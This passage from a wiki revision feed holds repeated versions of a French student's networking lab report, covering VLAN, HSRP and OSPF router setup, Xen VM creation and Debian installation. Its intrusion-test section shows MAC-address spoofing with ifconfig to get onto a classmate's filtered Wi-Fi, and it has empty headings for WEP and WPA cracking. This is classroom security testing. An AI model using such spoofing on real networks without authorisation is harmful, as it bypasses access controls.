Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22930</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22930"/>
				<updated>2015-11-13T14:07:44Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22929</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22929"/>
				<updated>2015-11-13T14:00:20Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
